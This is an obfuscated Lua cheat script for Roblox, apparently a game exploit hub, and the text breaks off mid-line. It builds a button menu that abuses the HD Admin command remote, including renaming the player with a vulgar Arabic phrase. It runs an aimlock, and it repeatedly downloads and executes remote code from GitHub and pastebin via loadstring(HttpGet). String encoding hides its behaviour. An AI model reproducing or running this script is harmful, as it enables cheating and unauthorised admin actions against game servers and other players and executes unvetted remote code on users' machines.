--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v25=1 + 0, #v9 do v6(v11,v0(v4(v1(v2(v9,v25,v25 + (1 -0))),v1(v2(v10,1 + 0 + ((v25-(2 -(3 -2)))% #v10),(1 -0) + ((v25-1)% #v10) + (1 -0))))%(1051 -((1160 -(41 + 666)) + 31 + 311))));end return v5(v11);end local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/Bekonader/bahahaha/main/Bahahah",true))();if v8[game.Players.LocalPlayer.Name] then wait(0.5);local v12={[1]=v7("\160\54\179\120\16\193\169\181\187\101\235\119\14\152\190\224\254","\155\85\219\25\98\225\196\208")};game:GetService(v7("\254\166\176\26\197\160\161\2\201\167\147\2\195\177\161\17\201","\172\195\192\118")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v12));wait(1);local v12={[1004 -((744 -291) + 550)]=";name me اه اه كـسـ ي"};game:GetService(v7("\70\91\98\199\211\53\117\74\119\207\233\34\123\76\115\204\223","\20\62\18\171\186\86")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v12));else local v13=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();local v14=v13:MakeWindow({[v7("\2\36\25\210","\76\69\116\183\114\72")]=v7("\84\12\58\17\137\81\5\84\105\13\126\155\79","\22\73\113\94\169\25\80"),[v7("\0\12\255\114\24\23\254\122\33\16\246","\72\101\155\23")]=false,[v7("\3\43\16\82\229\105\47\61\16","\74\69\100\32\138\61")]=v7("\126\204\125\219\57\217\10\233\28\245\22\166\79","\60\137\54\148\25\145\95\171"),[v7("\13\20\53\31\107\70\48\19\42\29","\94\117\67\122\40\41")]=true,[v7("\48\211\0\177\198\2\227\28\208\10\178\221","\115\188\110\215\175\101\165")]=v7("\154\149\150\198\255\56\1\154\240\161\169\237\38","\216\208\221\137\223\112\84")});local v15=v14:MakeTab({[v7("\221\79\221\160","\147\46\176\197\37\127")]=v7("\110\137\197\33","\38\198\136\100\54\21\72\179"),[v7("\51\7\237\234","\122\100\130\132\126\230")]="rbxassetid://4483345998",[v7("\129\23\50\142\205\175\188\42\57\143\221","\209\101\87\227\164\218")]=false});local v16=v15:AddSection({[v7("\140\233\252\246","\194\136\145\147\73\176\84")]=v7("\2\4\87\215","\74\75\26\146\75")});v15:AddButton({[v7("\11\72\251\53","\69\41\150\80")]=v7("\236\10","\190\79\25\114"),[v7("\117\225\92\200\185\141\70\28","\54\128\48\164\219\236\37\119")]=function()wait(0.1);local v26={[(1 + 0) -(0 + 0)]=v7("\13\38\40","\54\84\77\196\41")};game:GetService(v7("\24\91\229\230\9\56\87\55\47\90\198\254\15\41\87\36\47","\74\62\149\138\96\91\54\67")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v26));end});v15:AddButton({[v7("\213\177\191\184","\155\208\210\221\211\22\129\50")]=v7("\24\47","\74\25\144\44\123\213"),[v7("\100\223\203\94\69\223\196\89","\39\190\167\50")]=function()wait(0.1);local v27={[1]=v7("\255\229\248\215\43\172\168\250\192\123\128\231\249\196\55\160\220\229\208\54\180\168","\196\136\151\165\91")};game:GetService(v7("\96\230\161\224\210\228\230\9\87\231\130\248\212\245\230\26\87","\50\131\209\140\187\135\135\125")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait(0.1);local v27={[1 + 0]=v7("\65\190\182\253\230","\122\221\222\156\148\107\179")};game:GetService(v7("\245\160\38\52\206\166\55\44\194\161\5\44\200\183\55\63\194","\167\197\86\88")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait(0.1 + 0);local v27={[461 -(49 + 411)]=v7("\246\244\65\153\76\185\56\160\252\14\133\83\190\122\252\185","\205\153\46\235\60\209\24")};game:GetService(v7("\57\162\150\80\2\164\135\72\14\163\181\72\4\181\135\91\14","\107\199\230\60")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait(0.1);local v27={[1 + 0]=v7("\22\50\175\193\240\197\79","\45\71\193\162\152\164\61\91")};game:GetService(v7("\70\48\161\200\229\121\117\33\180\192\223\110\123\39\176\195\233","\20\85\209\164\140\26")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));end});local v17=v14:MakeTab({[v7("\103\250\234\5","\41\155\135\96\211")]=v7("\144\166\198\122\175","\209\226\139\51\225\164\194\99"),[v7("\47\52\242\190","\102\87\157\208\161")]="rbxassetid://4483345998",[v7("\205\211\230\10\176\213\240\238\237\11\160","\157\161\131\103\217\160")]=false});local v16=v17:AddSection({[v7("\37\191\13\161","\107\222\96\196\102\216\229")]=v7("\94\195\121\195\223","\31\135\52\138\145\212")});v17:AddButton({[v7("\102\187\228\89","\40\218\137\60")]=v7("\136\203\146\111\135\175\150\112","\201\143\223\38"),[v7("\25\56\34\247\79\90\57\50","\90\89\78\155\45\59")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end});v17:AddButton({[v7("\164\113\11\58","\234\16\102\95\105\131\161")]=v7("\108\63\174\235\99\91\170\236\107\50\173\235\121\62\186\235\104\55\167","\45\123\227\162"),[v7("\103\247\222\142\70\247\209\137","\36\150\178\226")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();end});local v18=v14:MakeTab({[v7("\115\114\42\160","\61\19\71\197\20\120")]=v7("\96\6\157\234\8\18\125\19\3\138","\51\69\207\163\88\70\46"),[v7("\152\138\173\132","\209\233\194\234\86\114\89\220")]="rbxassetid://4483345998",[v7("\99\183\185\232\232\70\168\147\235\237\74","\51\197\220\133\129")]=false});local v16=v18:AddSection({[v7("\236\251\237\16","\162\154\128\117\109\31")]=v7("\238\226\237\123\220\139\238\129\249\119","\189\161\191\50\140\223")});local v19=v14:MakeTab({[v7("\104\32\207\38","\38\65\162\67\182\188\19")]=v7("\113\32\137\8\114\55\136","\34\99\219\65"),[v7("\122\57\50\0","\51\90\93\110")]="rbxassetid://4483345998",[v7("\46\220\7\186\252\111\120\49\192\14\174","\126\174\98\215\149\26\21")]=false});local v16=v19:AddSection({[v7("\4\171\219\50","\74\202\182\87\193\93")]=v7("\141\169\113\240\138\113\79","\222\234\35\185\218\37\28\141")});v18:AddButton({[v7("\165\43\33\65","\235\74\76\36\109")]=v7("\121\7\110\59\28\104\18","\60\65\40\126\95"),[v7("\137\72\64\252\65\171\74\71","\202\41\44\144\35")]=function()wait(1);local v28={[(317 + 107) -((576 -250) + 11 + 86)]=v7("\68\94\79\111\15\36\242\18\86\0\121","\127\51\32\29\127\76\210")};game:GetService(v7("\178\54\108\4\137\48\125\28\133\55\79\28\143\33\125\15\133","\224\83\28\104")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1177 -(195 + 981));local v28={[619 -(344 + 274)]=v7("\15\238\23\148\213\174\20\238\29\198\203\169\91\225\73","\52\131\120\230\165\198")};game:GetService(v7("\186\75\175\18\133\139\79\171\27\136\187\90\176\12\141\143\75","\232\46\223\126\236")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((1 -0) + 0);local v28={[(1767 -(291 + 1472)) -(202 -(142 + 57))]=v7("\138\33\140\192\54","\177\66\228\161\68\124\218\85")};game:GetService(v7("\247\11\61\222\94\198\15\57\215\83\246\26\34\192\86\194\11","\165\110\77\178\55")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[(1371 -(690 + 680)) -0]=v7("\243\167\3\244\232\162\7\160\249\250\82\179\240\254\82\181\249","\200\207\98\128")};game:GetService(v7("\132\116\186\194\166\74\199\162\116\174\253\187\70\212\183\118\175","\214\17\202\174\207\41\166")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\223\80\10\80\243\216\38\196\9\83\19\234\140\123\212\13\93","\228\56\107\36\211\181\67")};game:GetService(v7("\210\249\208\47\233\255\193\55\229\248\243\55\239\238\193\36\229","\128\156\160\67")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((1 + 0) -(0 + 0));local v28={[4 -3]=v7("\134\44\254\191\190\24\203\157\117\168\255\170\69\152\141\118\166\249","\189\68\159\203\158\117\174")};game:GetService(v7("\6\239\194\235\197\55\235\198\226\200\7\254\221\245\205\51\239","\84\138\178\135\172")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + (0 -0));local v28={[1 + 0]=v7("\211\92\228\167\112\15\94\225\218\5\176\228\97\90\14\240\221","\232\52\133\211\80\98\59\193")};game:GetService(v7("\106\63\65\170\68\170\243\76\63\85\149\89\166\224\89\61\84","\56\90\49\198\45\201\146")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((6 -4) -(1532 -(1135 + 396)));local v28={[1 -0]=v7("\68\125\172\196\177\18\112\237\129\168\77\32\248\135\168\78\38","\127\21\205\176\145")};game:GetService(v7("\214\197\16\184\239\239\57\240\197\4\135\242\227\42\229\199\5","\132\160\96\212\134\140\88")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((1206 -(544 + 661)) + (0 -0));local v28={[1]=v7("\184\58\1\149\179\251\190\105\178\106\83\213\165\174\226\127\176","\131\82\96\225\147\150\219\73")};game:GetService(v7("\132\51\68\46\191\53\85\54\179\50\103\54\185\36\85\37\179","\214\86\52\66")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0 + (0 -0));local v28={[(1 + 0) -(0 -0)]=v7("\47\123\77\16\86\23\211\197\37\39\29\83\66\72\130\212\44","\20\19\44\100\118\122\182\229")};game:GetService(v7("\122\50\221\82\17\172\161\43\77\51\254\74\23\189\161\56\77","\40\87\173\62\120\207\192\95")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1496 -(1384 + 111));local v28={[363 -((550 -409) + (448 -227))]=v7("\103\237\124\160\103\73\214\203\109\182\47\236\119\29\135\216\109","\92\133\29\212\71\36\179\235")};game:GetService(v7("\118\70\240\184\129\71\66\244\177\140\119\87\239\166\137\67\70","\36\35\128\212\232")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\11\143\206\254\231\165\85\199\158\190\240\252\6\210\152","\48\231\175\138\199\200")};game:GetService(v7("\210\51\84\197\233\53\69\221\229\50\119\221\239\36\69\206\229","\128\86\36\169")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\184\235\202\30\226\238\230\139\88\241\176\180\155\95\241\182\183","\131\131\171\106\194")};game:GetService(v7("\51\121\109\204\199\142\139\21\121\121\243\218\130\152\0\123\120","\97\28\29\160\174\237\234")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + (311 -(156 + 155)));local v28={[1]=v7("\224\190\203\53\90\129\190\246\146\120\75\219\234\230\157\112","\219\214\170\65\122\236")};game:GetService(v7("\177\240\76\218\162\15\204\151\240\88\229\191\3\223\130\242\89","\227\149\60\182\203\108\173")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + (1004 -(723 + 281)));local v28={[1928 -(235 + 497 + (2565 -1370))]=v7("\134\78\215\223\116\208\67\150\154\99\142\16\132\159\98\136\23","\189\38\182\171\84")};game:GetService(v7("\226\198\79\252\85\59\234\196\198\91\195\72\55\249\209\196\90","\176\163\63\144\60\88\139")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1]=v7("\133\17\171\94\63\211\28\234\27\40\141\79\248\30\40\138\64","\190\121\202\42\31")};game:GetService(v7("\210\115\109\30\10\229\225\98\120\22\48\242\239\100\124\21\6","\128\22\29\114\99\134")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1 + 0]=v7("\137\183\167\144\131\223\186\230\213\148\129\233\244\208\149\130\237","\178\223\198\228\163")};game:GetService(v7("\73\85\188\246\213\125\181\111\85\168\201\200\113\166\122\87\169","\27\48\204\154\188\30\212")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\21\226\139\189\14\231\143\233\31\189\217\255\28\190\220\240\25","\46\138\234\201")};game:GetService(v7("\56\249\26\201\164\209\92\30\249\14\246\185\221\79\11\251\15","\106\156\106\165\205\178\61")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1974 -(923 + 1050)]=v7("\33\166\172\142\30\22\173\9\126\244\238\156\71\70\187\9","\73\199\216\174\115\115\141\56")};game:GetService(v7("\154\231\57\184\43\20\201\188\231\45\135\54\24\218\169\229\44","\200\130\73\212\66\119\168")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\114\197\205\153\105\192\201\205\120\159\148\223\120\154\148\213\124","\73\173\172\237")};game:GetService(v7("\238\117\57\92\40\37\20\248\217\116\26\68\46\52\20\235\217","\188\16\73\48\65\70\117\140")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1]=v7("\88\127\119\247\67\122\115\163\81\37\32\178\91\46\46\180\82","\99\23\22\131")};game:GetService(v7("\135\48\192\221\34\200\180\33\213\213\24\223\186\39\209\214\46","\213\85\176\177\75\171")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1]=v7("\24\217\116\158\144\14\130\187\16\128\36\222\133\83\214\168\18","\35\177\21\234\176\99\231\155")};game:GetService(v7("\55\9\204\18\222\64\4\24\217\26\228\87\10\30\221\25\210","\101\108\188\126\183\35")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 -0);local v28={[1 + 0]=v7("\250\78\235\173\178\77\88\225\23\188\224\166\20\9\244\23\191","\193\38\138\217\146\32\61")};game:GetService(v7("\11\9\88\167\171\23\203\167\60\8\123\191\173\6\203\180\60","\89\108\40\203\194\116\170\211")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1 -0]=v7("\9\188\10\41\247\76\20\18\230\95\108\230\19\71\4\227","\50\212\107\93\215\33\113")};game:GetService(v7("\152\176\200\140\25\16\171\161\221\132\35\7\165\167\217\135\21","\202\213\184\224\112\115")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((4199 -3273) -(866 + 59));local v28={[1]=v7("\255\246\127\35\78\169\251\62\100\93\244\169\46\97\87\242","\196\158\30\87\110")};game:GetService(v7("\23\87\175\122\124\165\192\49\87\187\69\97\169\211\36\85\186","\69\50\223\22\21\198\161")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((47 + 237) -((666 -(397 + 165)) + (609 -(139 + 291))));local v28={[(362 -(23 + 15)) -(63 + 260)]=v7("\46\116\24\66\65\213\112\60\75\0\83\142\35\37\78\3\87","\21\28\121\54\97\184")};game:GetService(v7("\36\233\41\85\69\112\23\248\60\93\127\103\25\254\56\94\73","\118\140\89\57\44\19")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(205 -(46 + 158));local v28={[1463 -(1443 + 19)]=v7("\107\6\228\200\231\171\213\112\92\182\143\245\243\131\99\95\180","\80\110\133\188\199\198\176")};game:GetService(v7("\187\241\177\230\17\14\136\224\164\238\43\25\134\230\160\237\29","\233\148\193\138\120\109")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[(222 -(96 + 125)) + 0]=v7("\237\15\47\123\165\27","\214\104\67\26")};game:GetService(v7("\205\68\205\232\249\252\64\201\225\244\204\85\210\246\241\248\68","\159\33\189\132\144")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(646 -(6 + 639));local v28={[339 -(116 + 222)]=v7("\224\218\190\18\67\169\153\188\27\12\180\203\176\16\75\190","\219\185\209\126\44")};game:GetService(v7("\64\36\3\249\93\183\115\53\22\241\103\160\125\51\18\242\81","\18\65\115\149\52\212")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));game:GetService(v7("\221\184\119\5\208\235\190\81\2\205","\142\204\22\119\164")):SetCore(v7("\102\231\183\224\206\207\54\92\228\176\231\225\212\43\90\236","\53\130\217\132\128\160\66"),{[v7("\196\87\150\192\176","\144\62\226\172\213\142\115")]="اكتملت الhats بنجاح",[v7("\217\130\66\67","\141\231\58\55\80\168")]="مبروك صرت مزعج مره",[v7("\3\131\215\15","\74\224\184\97\171\207")]="rbxthumb://type=Asset&id=5107182114&w=150&h=150"});Duration=32;end});v19:AddButton({[v7("\35\75\31\208","\109\42\114\181\88\224\218")]=v7("\172\90\102\168\104\121\163\83","\237\20\50\225\42\56"),[v7("\115\91\15\234\227\85\192\62","\48\58\99\134\129\52\163\85")]=function()local v29=Instance.new(v7("\3\25\1\29\53\20\52\13\57","\80\122\115\120"));local v30=Instance.new(v7("\28\177\56\95\208","\90\195\89\50\181\175\30"));local v31=Instance.new(v7("\127\118\193\244\103\114\219\229\71","\43\19\185\128"));local v32=Instance.new(v7("\74\41\10\25\199\107\56\6\2\235","\30\76\114\109\133"));local v33=Instance.new(v7("\75\72\50\48\18\236\107\89\37\42","\31\45\74\68\80\153"));local v34=Instance.new(v7("\104\81\171\87\89\72\72\64\188\77","\60\52\211\35\27\61"));antibang=function()while _G.antibang==true do game.Players:Chat(v7("\200\246\81\111\206\26\219\136\240","\230\151\63\27\167\120\186"));wait(1);end end;v29.Parent=game.Players.LocalPlayer:WaitForChild(v7("\62\34\45\157\11\60\11\145\7","\110\78\76\228"));v29.ResetOnSpawn=false;v30.Parent=v29;v30.BackgroundColor3=Color3.fromRGB((18 -5) + (173 -103),9 + 74,1356 -(756 + 517));v30.Position=UDim2.new(0.0661887601 + 0,0,(0.293827176 + 0) -(220 -(155 + 65)),1112 -(1048 + 64));v30.Size=UDim2.new(0,100,0 -0,100);v30.Active=true;v30.Draggable=true;v31.Parent=v30;v31.BackgroundColor3=Color3.fromRGB(255,2 + 83,0);v31.Position=UDim2.new( -0.00410109013,(292 -(222 + 59)) -((1601 -(522 + 1075)) + (512 -(431 + 74))), -(0.00617286563 + 0 + 0),0 + 0);v31.Size=UDim2.new(574 -((424 -266) + (1551 -1135)),265 -165,0,52 -33);v31.Font=Enum.Font.SourceSans;v31.Text=v7("\90\85\232\51\180\224\120\143","\59\59\156\90\214\129\22\232");v31.TextColor3=Color3.fromRGB(0,0,0);v31.TextScaled=true;v31.TextSize=40 -26;v31.TextWrapped=true;v32.Parent=v30;v32.BackgroundColor3=Color3.fromRGB((1313 -(321 + 810)) -(277 -180),(4473 -3035) -(491 + 114 + 748),0 + 0);v32.Position=UDim2.new((423 -159) -((1680 -(604 + 1026)) + 214),0 -0,0.269999981 + 0,0);v32.Size=UDim2.new(0,(638 -(588 + 5)) + 55,(2368 -1039) -(442 + 397 + 490),1109 -(12 + 492 + (1573 -(160 + 828))));v32.Font=Enum.Font.SourceSans;v32.Text=v7("\254\252\51\163\224\152\55\243\176\55\165\171\222\49\239\227\46","\157\144\90\192\139\184\88");v32.TextColor3=Color3.fromRGB(737 -(344 + 393),0 + 0,429 -(364 + 65));v32.TextScaled=true;v32.TextSize=(223 + 24) -(35 + 198);v32.TextWrapped=true;v32.MouseButton1Down:connect(function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end);v33.Parent=v30;v33.BackgroundColor3=Color3.fromRGB(31 + 41 + (1785 -(1389 + 383)),85,(0 + 0) -(0 + 0));v33.Position=UDim2.new((0 + 0) -0,0 -(0 -0),0.539999962,0 + 0);v33.Size=UDim2.new(0 + 0 + 0,483 -383,0 -(0 -0),20);v33.Font=Enum.Font.SourceSans;v33.Text=v7("\215\172\184\94\161\245\122\209","\182\194\204\55\195\148\20");v33.TextColor3=Color3.fromRGB(1006 -(305 + 701),1372 -(488 + 175 + (2510 -(172 + 1629))),0 + 0);v33.TextScaled=true;v33.TextSize=640 -(183 + 443);v33.TextWrapped=true;v33.MouseButton1Down:connect(function()_G.antibang=true;antibang();end);v34.Parent=v30;v34.BackgroundColor3=Color3.fromRGB(85,(221 + 33) -(105 + 64),67 -(17 + 50));v34.Position=UDim2.new(0,0,0.800000012,0);v34.Size=UDim2.new(0 -0,(15 + 184) -(171 -72),0,215 -(32 + 135 + 28));v34.Font=Enum.Font.SourceSans;v34.Text=v7("\195\64\180\49\71\164\203\196\93\185\32\9\162","\176\52\219\65\103\197\165");v34.TextColor3=Color3.fromRGB(1824 -(1293 + 531),0,0);v34.TextScaled=true;v34.TextSize=14;v34.TextWrapped=true;v34.MouseButton1Down:connect(function()_G.antibang=false;end);end});local v20=v14:MakeTab({[v7("\32\180\39\184","\110\213\74\221")]=v7("\55\236\4\247","\112\185\77\164\223\129\21"),[v7("\16\29\233\31","\89\126\134\113\180\47\95")]="rbxassetid://4483345998",[v7("\252\199\189\20\140\4\60\227\219\180\0","\172\181\216\121\229\113\81")]=false});local v16=v20:AddSection({[v7("\192\28\116\62","\142\125\25\91\132\136\101")]=v7("\45\217\29\111","\106\140\84\60")});v20:AddButton({[v7("\4\237\207\194","\74\140\162\167\206\39\71")]=v7("\35\160\251\117\105\42\21\249\237","\112\217\149\20\25\89"),[v7("\210\186\242\217\243\186\253\222","\145\219\158\181")]=function()loadstring(game:HttpGet("https://pastebin.com/raw/tWGxhNq0"))();end});v20:AddButton({[v7("\114\84\54\137","\60\53\91\236")]=v7("\61\239\186\51\56\142\161\53\59","\121\174\233\96"),[v7("\236\73\10\35\76\206\75\13","\175\40\102\79\46")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Makramdaca/dacca/main/.github/workflows/blank.yml"))();end});v19:AddButton({[v7("\149\120\207\52","\219\25\162\81\193\180\153\208")]=v7("\134\156\242\63\91\232\142\157\245","\199\210\187\114\26\188"),[v7("\198\188\14\48\54\181\35\238","\133\221\98\92\84\212\64")]=function()Animation=function(v95)v95:WaitForChild(v7("\173\26\75\74\141\0\71","\236\116\34\39"));game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=true;for v97,v98 in ipairs(game.Players:GetChildren()) do local v99=game.Players.LocalPlayer.Character.Animate;v99.idle.Animation1.AnimationId="http://www.roblox.com/asset/?id=782841498";v99.idle.Animation2.AnimationId="http://www.roblox.com/asset/?id=782841498";v99.walk.WalkAnim.AnimationId="http://www.roblox.com/asset/?id=616168032";v99.run.RunAnim.AnimationId="http://www.roblox.com/asset/?id=616163682";v99.jump.JumpAnim.AnimationId="http://www.roblox.com/asset/?id=1083218792";v99.climb.ClimbAnim.AnimationId="http://www.roblox.com/asset/?id=1083439238";v99.fall.FallAnim.AnimationId="http://www.roblox.com/asset/?id=707829716";v99.swim.Swim.AnimationId="http://www.roblox.com/asset/?id=616165109";v99.swimidle.SwimIdle.AnimationId="http://www.roblox.com/asset/?id=616166655";game.Players.LocalPlayer.Character.Humanoid.Jump=false;end wait(1 -0);game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=false;end;Animation(game.Players.LocalPlayer.Character);game.Players.LocalPlayer.CharacterAdded:Connect(Animation);end});local v21=v14:MakeTab({[v7("\111\191\52\221","\33\222\89\184\117\123")]=v7("\27\15\107","\72\74\51\102\146\170\214"),[v7("\148\128\118\135","\221\227\25\233")]="rbxassetid://4483345998",[v7("\96\57\30\187\212\250\93\4\21\186\196","\48\75\123\214\189\143")]=false});local v16=v21:AddSection({[v7("\17\184\34\194","\95\217\79\167\142\141")]=v7("\211\151\109","\128\210\53\24\232\150\102")});v15:AddButton({[v7("\20\217\197\92","\90\184\168\57\139")]=v7("\34\212\57\242\132\40\195\36","\105\145\96\176\203"),[v7("\255\63\16\170\187\127\237\245","\188\94\124\198\217\30\142\158")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt",true))();end});local v22=v14:MakeTab({[v7("\35\34\221\68","\109\67\176\33\155\87")]=v7("\127\239\3\161\132\42\127","\59\174\35\233\203\101"),[v7("\101\43\191\232","\44\72\208\134")]="rbxassetid://4483345998",[v7("\141\93\81\91\118\168\66\123\88\115\164","\221\47\52\54\31")]=false});local v16=v22:AddSection({[v7("\24\247\62\9","\86\150\83\108\128\172")]=v7("\57\112\98\198\231\55\58","\125\49\66\142\168\120\126\105")});v22:AddButton({[v7("\133\1\72\65","\203\96\37\36\67\21\187\81")]=v7("\91\112\202\161\16\50\83\119\209\187\10\94\87\112\200","\18\62\156\232\67\18"),[v7("\163\7\186\183\22\28\61\139","\224\102\214\219\116\125\94")]=function()local v84=loadstring(game:HttpGet("https://raw.githubusercontent.com/Kinlei/Dynissimo/main/Scripts/AkaliNotif.lua"))();local v85=v84.Notify;v85({[v7("\158\4\111\52\170\90\201\220\179\14\114","\218\97\28\87\216\51\185\168")]=v7("\128\17\225\249\172\16\34\133\26\183\241\182\20\34\134\11","\233\127\151\144\223\121\64"),[v7("\43\20\236\46\192","\127\125\152\66\165\126\182")]=v7("\30\19\242\118\192\9\10\82\221\97\153\24\80\68\175\33\214","\115\114\150\19\224\107"),[v7("\45\208\193\219\144\0\202\221","\105\165\179\186\228")]=8 + 2});loadstring(game:HttpGet("https://raw.githubusercontent.com/RFS-cmd/-/main/first"))();Aiming.TargetPart={v7("\216\185\173\177","\144\220\204\213")};Aiming.FOV=190;Aiming.FOVSides=202 + 48;Aiming.HitChance=100;Aiming.ShowFOV=flace;getgenv().AutoPrediction=true;getgenv().Prediction=(1472.157 -974) -(155 + 252 + (397 -306));if (getgenv().AutoPrediction==true) then h=function()while true do wait();local v110=game:GetService(v7("\100\200\252\109\74","\55\188\157\25\57\84\19")).Network.ServerStatsItem[v7("\226\199\241\208\131\246\207\235\214","\166\166\133\177\163")]:GetValueString();local v111=string.split(v110,"(");local v112=tonumber(v111[551 -(192 + 358)]);if ((v112>(267 -67)) and (v112<((1329 -(64 + 680)) -(392 -(96 + 11))))) then getgenv().Predictio=0.18742 + 0;elseif ((v112>((2614 -(401 + 1539)) -((1575 -(1129 + 386)) + 434))) and (v112<(1166 -(203 + 768)))) then getgenv().Predictio=(680.1677912299999 -202) -(350 + (1173 -(638 + 407)));elseif ((v112>(435 -295)) and (v112<(119 + 61))) then getgenv().Predictio=0.16 -(1615 -(940 + 675));elseif ((v112>(893 -(82 + 701))) and (v112<(54 + 86))) then getgenv().Predictio=0.15934 -(0 -0);elseif (v112<(244 -139)) then getgenv().Predictio=0.138 -0;elseif (v112<(1154 -(920 + 144))) then getgenv().Predictio=0.136 + 0;elseif (v112<80) then getgenv().Predictio=1106.134 -(638 + 468);elseif (v112<70) then getgenv().Predictio=0.131;elseif (v112<(57 + 3)) then getgenv().Predictio=(0.1229 -0) + 0;elseif (v112<(101 -51)) then getgenv().Predictio=0.1225;elseif (v112<(324 -(16 + 268))) then getgenv().Predictio=(1566.1256 -(312 + 1254)) -(0 -0);end getgenv().Prediction=getgenv().Predictio;end end;spawn(h);end end});local v23=v14:MakeTab({[v7("\251\140\124\175","\181\237\17\202\71")]=v7("\224\253\230\247\242\248\105\132\241\137\251\248\243\105","\164\188\198\191\189\183\45"),[v7("\45\17\23\239","\100\114\120\129\18")]="rbxassetid://4483345998",[v7("\22\16\169\215\86\51\15\131\212\83\63","\70\98\204\186\63")]=false});local v16=v23:AddSection({[v7("\173\71\76\114","\227\38\33\23\228\165\232")]=v7("\97\29\163\97\106\128\97\124\206\102\97\138\97\24","\37\92\131\41\37\207")});v23:AddButton({[v7("\237\246\47\202","\163\151\66\175\197\109")]=v7("\29\5\141\154\16\3\131\241\124\8\129\154\20\3\143\254\124\1\143\254\25\8\132","\92\76\192\186"),[v7("\137\137\233\41\244\54\169\131","\202\232\133\69\150\87")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/FDHKZY/Hood-Moddedaimlock/main/GU%C4%B0",true))();end});v22:AddButton({[v7("\232\224\25\26","\166\129\116\127\33")]=v7("\4\197\122\147\123\106\221\126\146","\74\144\49\214\41"),[v7("\81\130\43\191\2\95\189\136","\18\227\71\211\96\62\222\227")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Allvideo/test/main/Whitelist.txt"))();end});v21:AddParagraph(v7("\168\236\0\220\223\189\191\176\184\236\2\215","\203\131\109\185\182\211\216\144"),v7("\252\73\13\48\27\14\216\188\246\82\64\63\7\19\203\188\230\82\66\52\79","\149\61\45\90\110\125\172\156"));local 